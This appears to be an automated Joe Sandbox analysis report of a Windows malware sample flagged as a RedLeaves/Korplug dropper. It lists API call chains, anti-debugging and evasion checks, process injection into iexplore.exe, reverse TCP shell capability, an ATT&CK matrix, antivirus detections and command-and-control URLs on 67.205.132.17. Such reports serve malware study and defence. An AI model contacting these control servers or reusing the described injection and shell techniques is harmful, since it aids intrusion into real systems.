Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 3_2_0042D738 IsIconic,GetWindowPlacement,GetWindowRect,3_2_0042D738
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 3_2_00463F4C IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,3_2_00463F4C
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 3_2_00463FFC IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,3_2_00463FFC
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_00430384 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00430384
Source: C:\Users\user\Desktop\cANdLlHS4N.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\AppData\Local\Temp\obedience.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Contains functionality to detect sleep reduction / modifications
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_0043EDE41_2_0043EDE4
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 3_2_0043EDE43_2_0043EDE4
Source: C:\Users\user\AppData\Local\Temp\obedience.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_1-47245
Source: C:\Users\user\Desktop\cANdLlHS4N.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_0-21982
Source: C:\Users\user\AppData\Local\Temp\obedience.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\00000409Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\obedience.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\00000409Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,1_2_00462D8C
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: GetCurrentThreadId,GetCursorPos,WaitForSingleObject,3_2_00462D8C
Source: C:\Users\user\AppData\Local\Temp\obedience.exeAPI coverage: 6.2 %
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeAPI coverage: 6.4 %
Source: C:\Users\user\AppData\Local\Temp\obedience.exeAPI coverage: 6.0 %
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 3_2_0043EDE43_2_0043EDE4
Source: C:\Users\user\Desktop\cANdLlHS4N.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_004273EC GetSystemInfo,1_2_004273EC
Source: C:\Users\user\Desktop\cANdLlHS4N.exeCode function: 0_2_009C8B98 __EH_prolog3_GS,GetFullPathNameA,__cftof,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,_strcpy_s,0_2_009C8B98
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_00409798 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,1_2_00409798
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_00405F34 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,1_2_00405F34
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_04B4B33C FindFirstFileW,FindClose,2_2_04B4B33C
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 3_2_00409798 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,3_2_00409798
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 3_2_00405F34 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,3_2_00405F34
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeAPI call chain: ExitProcess graph end nodegraph_2-47130
Source: C:\Users\user\AppData\Local\Temp\obedience.exeFile opened: C:\Users\userJump to behavior
Source: C:\Users\user\AppData\Local\Temp\obedience.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
Source: C:\Users\user\AppData\Local\Temp\obedience.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Users\user\AppData\Local\Temp\obedience.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
Source: C:\Users\user\AppData\Local\Temp\obedience.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\AppData\Local\Temp\obedience.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
Source: C:\Users\user\Desktop\cANdLlHS4N.exeCode function: 0_2_00AAB46A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00AAB46A
Source: C:\Users\user\Desktop\cANdLlHS4N.exeCode function: 0_2_00AC046C LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00AC046C
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_04B4BC1E GetProcessHeap,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,2_2_04B4BC1E
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_03000019 mov eax, dword ptr fs:[00000030h]2_2_03000019
Source: C:\Users\user\Desktop\cANdLlHS4N.exeCode function: 0_2_00AAB46A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00AAB46A
Source: C:\Users\user\Desktop\cANdLlHS4N.exeCode function: 0_2_00AB4A12 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00AB4A12
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_6ED9862C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_6ED9862C
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_04B605A4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_04B605A4
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_04B58E89 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_04B58E89
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 3_2_6EE5862C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6EE5862C

HIPS / PFW / Operating System Protection Evasion

barindex
Writes to foreign memory regions
Source: C:\Users\user\AppData\Local\Temp\obedience.exeMemory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 3000000Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\obedience.exeMemory written: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 923650Jump to behavior
Allocates memory in foreign processes
Source: C:\Users\user\AppData\Local\Temp\obedience.exeMemory allocated: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 3000000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\obedience.exeMemory allocated: C:\Program Files (x86)\Internet Explorer\iexplore.exe base: 2D00000 protect: page execute and read and writeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\obedience.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\iexplore.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\obedience.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe C:\Program Files (x86)\Internet Explorer\iexplore.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\obedience.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\obedience.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\cANdLlHS4N.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00AC2663
Source: C:\Users\user\Desktop\cANdLlHS4N.exeCode function: GetLocaleInfoA,0_2_00AB0970
Source: C:\Users\user\Desktop\cANdLlHS4N.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_00AC2AEB
Source: C:\Users\user\Desktop\cANdLlHS4N.exeCode function: _strcpy_s,GetLocaleInfoA,__snwprintf_s,LoadLibraryA,0_2_009B1AD1
Source: C:\Users\user\Desktop\cANdLlHS4N.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,0_2_00AC2B8E
Source: C:\Users\user\Desktop\cANdLlHS4N.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_00AC2B52
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,1_2_0040610C
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,1_2_00406217
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: GetLocaleInfoA,1_2_0040C46C
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: GetLocaleInfoA,1_2_0040C420
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: GetLocaleInfoA,1_2_00406A94
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: GetLocaleInfoA,GetACP,1_2_0040DB00
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,1_2_6ED9CB7A
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,1_2_6ED9C88C
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_free,_free,_free,_free,_free,_free,_free,_free,_free,2_2_0301C300
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,2_2_03027750
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,2_2_03026AF4
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,2_2_0302C81E
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: ___crtGetLocaleInfoA,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,__calloc_crt,_free,2_2_03024E41
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: GetLastError,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,2_2_04B64DAD
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,2_2_04B6C6B0
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_04B67E91
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: GetLocaleInfoA,2_2_04B5D7AC
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: GetLocaleInfoA,2_2_04B67F86
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,2_2_04B68088
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: GetLocaleInfoW,2_2_04B6802D
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: GetLocaleInfoA,2_2_04B68259
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,2_2_04B683BC
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: EnumSystemLocalesA,2_2_04B68380
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: GetLocaleInfoA,2_2_04B6CBDB
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: EnumSystemLocalesA,2_2_04B68319
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,3_2_0040610C
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,3_2_00406217
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: GetLocaleInfoA,3_2_0040C46C
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: GetLocaleInfoA,3_2_0040C420
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: GetLocaleInfoA,3_2_00406A94
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: GetLocaleInfoA,GetACP,3_2_0040DB00
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,3_2_6EE5CB7A
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,3_2_6EE5C88C
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_6EE600B0
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_04B50396 CreateMutexW,GetLastError,CreateNamedPipeW,CloseHandle,CreateEventW,ResetEvent,ResetEvent,ConnectNamedPipe,GetLastError,WaitForSingleObject,CloseHandle,CloseHandle,CloseHandle,CloseHandle,ResetEvent,AllocConsole,GetConsoleWindow,ShowWindow,SetConsoleCtrlHandler,CreateConsoleScreenBuffer,SetConsoleScreenBufferSize,SetConsoleActiveScreenBuffer,GetStdHandle,SHGetSpecialFolderPathW,CreateProcessW,FreeLibrary,CreateThread,CreateThread,CreateThread,FreeLibrary,2_2_04B50396
Source: C:\Users\user\Desktop\cANdLlHS4N.exeCode function: 0_2_00AB6E0F GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00AB6E0F
Source: C:\Users\user\Desktop\cANdLlHS4N.exeCode function: 0_2_00ABBE8D __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,0_2_00ABBE8D
Source: C:\Users\user\AppData\Local\Temp\obedience.exeCode function: 1_2_00450214 GetVersion,1_2_00450214

Remote Access Functionality

barindex
Contains functionality to start reverse TCP shell (cmd.exe)
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_04B50396 CreateMutexW,GetLastError,CreateNamedPipeW,CloseHandle,CreateEventW,ResetEvent,ResetEvent,ConnectNamedPipe,GetLastError,WaitForSingleObject,CloseHandle,CloseHandle,CloseHandle,CloseHandle,ResetEvent,AllocConsole,GetConsoleWindow,ShowWindow,SetConsoleCtrlHandler,CreateConsoleScreenBuffer,SetConsoleScreenBufferSize,SetConsoleActiveScreenBuffer,GetStdHandle,SHGetSpecialFolderPathW,CreateProcessW,FreeLibrary,CreateThread,CreateThread,CreateThread,FreeLibrary, string: cmd.exe2_2_04B50396
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeCode function: 2_2_04B5623C htons,htons,socket,getpeername,socket,socket,htons,htonl,bind,2_2_04B5623C

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
1
Valid Accounts		2
Native API		1
Valid Accounts		1
Valid Accounts		1
Deobfuscate/Decode Files or Information		21
Input Capture		2
System Time Discovery		Remote Services1
Archive Collected Data		Exfiltration Over Other Network Medium1
Ingress Tool Transfer		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts1
Command and Scripting Interpreter		2
Registry Run Keys / Startup Folder		1
Access Token Manipulation		2
Obfuscated Files or Information		LSASS Memory3
File and Directory Discovery		Remote Desktop Protocol1
Screen Capture		Exfiltration Over Bluetooth22
Encrypted Channel		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)212
Process Injection		1
Software Packing		Security Account Manager35
System Information Discovery		SMB/Windows Admin Shares21
Input Capture		Automated Exfiltration1
Non-Standard Port		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)2
Registry Run Keys / Startup Folder		11
Masquerading		NTDS14
Security Software Discovery		Distributed Component Object Model2
Clipboard Data		Scheduled Transfer1
Remote Access Software		SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
Valid Accounts		LSA Secrets2
Process Discovery		SSHKeyloggingData Transfer Size Limits1
Non-Application Layer Protocol		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.common1
Access Token Manipulation		Cached Domain Credentials11
Application Window Discovery		VNCGUI Input CaptureExfiltration Over C2 Channel2
Application Layer Protocol		Jamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup Items212
Process Injection		DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
cANdLlHS4N.exe78%VirustotalBrowse
cANdLlHS4N.exe65%MetadefenderBrowse
cANdLlHS4N.exe84%ReversingLabsWin32.Dropper.RedLeaves
cANdLlHS4N.exe100%AviraTR/Korplug.dryww

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\StarBurn.dll100%AviraHEUR/AGEN.1226539
C:\Users\user\AppData\Local\Temp\obedience.exe8%MetadefenderBrowse
C:\Users\user\AppData\Local\Temp\obedience.exe9%ReversingLabsWin32.PUA.Tsingsoft

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
3.2.obedience.exe.400000.0.unpack100%AviraHEUR/AGEN.1232827Download File
3.2.obedience.exe.6ee50000.1.unpack100%AviraHEUR/AGEN.1226539Download File
1.2.obedience.exe.6ed90000.1.unpack100%AviraHEUR/AGEN.1226539Download File
0.2.cANdLlHS4N.exe.2880000.3.unpack100%AviraTR/ATRAPS.GenDownload File
1.2.obedience.exe.400000.0.unpack100%AviraHEUR/AGEN.1232827Download File

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://67.205.132.17:4431%VirustotalBrowse
http://67.205.132.17:4430%Avira URL Cloudsafe
http://secure.globalsign.net/cacert/PrimObject.crt00%URL Reputationsafe
http://secure.globalsign.net/cacert/ObjectSign.crt090%URL Reputationsafe
http://www.globalsign.net/repository090%URL Reputationsafe
https://67.205.132.17:443/23I9/index.php0%Avira URL Cloudsafe
https://67.205.132.17:443/NEZTl2/index.php0%Avira URL Cloudsafe
https://67.205.132.17:443/hvnqlRD8z/index.php0%Avira URL Cloudsafe
http://www.globalsign.net/repository/00%URL Reputationsafe
https://67.205.132.17:443/M2c1Nb/index.php0%Avira URL Cloudsafe
https://67.205.132.17:443/3T3t/index.php0%Avira URL Cloudsafe
http://www.globalsign.net/repository/030%URL Reputationsafe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

NameMaliciousAntivirus DetectionReputation
https://67.205.132.17:443/23I9/index.phptrue
  • Avira URL Cloud: safe
unknown
https://67.205.132.17:443/NEZTl2/index.phptrue
  • Avira URL Cloud: safe
unknown
https://67.205.132.17:443/hvnqlRD8z/index.phptrue
  • Avira URL Cloud: safe
unknown
https://67.205.132.17:443/M2c1Nb/index.phptrue
  • Avira URL Cloud: safe
unknown
https://67.205.132.17:443/3T3t/index.phptrue
  • Avira URL Cloud: safe
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://67.205.132.17:443iexplore.exe, 00000002.00000002.500224676.0000000004C70000.00000004.00000020.00020000.00000000.sdmpfalse
  • 1%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://secure.globalsign.net/cacert/PrimObject.crt0cANdLlHS4N.exe, 00000000.00000002.246524283.00000000029EF000.00000004.00000800.00020000.00000000.sdmp, cANdLlHS4N.exe, 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp, obedience.exe.0.drfalse
  • URL Reputation: safe
unknown
http://secure.globalsign.net/cacert/ObjectSign.crt09cANdLlHS4N.exe, 00000000.00000002.246524283.00000000029EF000.00000004.00000800.00020000.00000000.sdmp, cANdLlHS4N.exe, 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp, obedience.exe.0.drfalse
  • URL Reputation: safe
unknown
http://www.globalsign.net/repository09cANdLlHS4N.exe, 00000000.00000002.246524283.00000000029EF000.00000004.00000800.00020000.00000000.sdmp, cANdLlHS4N.exe, 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp, obedience.exe.0.drfalse
  • URL Reputation: safe
unknown
http://www.audio-tool.netcANdLlHS4N.exe, 00000000.00000002.246215033.0000000002880000.00000004.00000800.00020000.00000000.sdmp, cANdLlHS4N.exe, 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp, obedience.exe, 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp, obedience.exe, 00000003.00000000.262529824.0000000000496000.00000002.00000001.01000000.00000004.sdmp, obedience.exe.0.drfalse
    		high
    http://www.globalsign.net/repository/0cANdLlHS4N.exe, 00000000.00000002.246524283.00000000029EF000.00000004.00000800.00020000.00000000.sdmp, cANdLlHS4N.exe, 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp, obedience.exe.0.drfalse
    • URL Reputation: safe
    		unknown
    http://www.globalsign.net/repository/03cANdLlHS4N.exe, 00000000.00000002.246524283.00000000029EF000.00000004.00000800.00020000.00000000.sdmp, cANdLlHS4N.exe, 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp, obedience.exe.0.drfalse
    • URL Reputation: safe
    		unknown

    World Map of Contacted IPs

    • No. of IPs < 25%
    • 25% < No. of IPs < 50%
    • 50% < No. of IPs < 75%
    • 75% < No. of IPs

    Public IPs

    IPDomainCountryFlagASNASN NameMalicious
    144.168.45.116
    		unknownUnited States
    		54540INCERO-HVVCUSfalse
    67.205.132.17
    		unknownUnited States
    		14061DIGITALOCEAN-ASNUStrue

    Private

    IP
    192.168.2.1

    General Information

    Joe Sandbox Version:34.0.0 Boulder Opal
    Analysis ID:586425
    Start date:10.03.2022
    Start time:07:20:28
    Joe Sandbox Product:CloudBasic
    Overall analysis duration:0h 11m 8s
    Hypervisor based Inspection enabled:false
    Report type:full
    Sample file name:cANdLlHS4N (renamed file extension from none to exe)
    Cookbook file name:default.jbs
    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
    Number of analysed new started processes analysed:14
    Number of new started drivers analysed:0
    Number of existing processes analysed:0
    Number of existing drivers analysed:0
    Number of injected processes analysed:0
    Technologies:
    • HCA enabled
    • EGA enabled
    • HDC enabled
    • AMSI enabled
    Analysis Mode:default
    Analysis stop reason:Timeout
    Detection:MAL
    Classification:mal100.troj.evad.winEXE@8/4@0/3
    EGA Information:
    • Successful, ratio: 100%
    HDC Information:
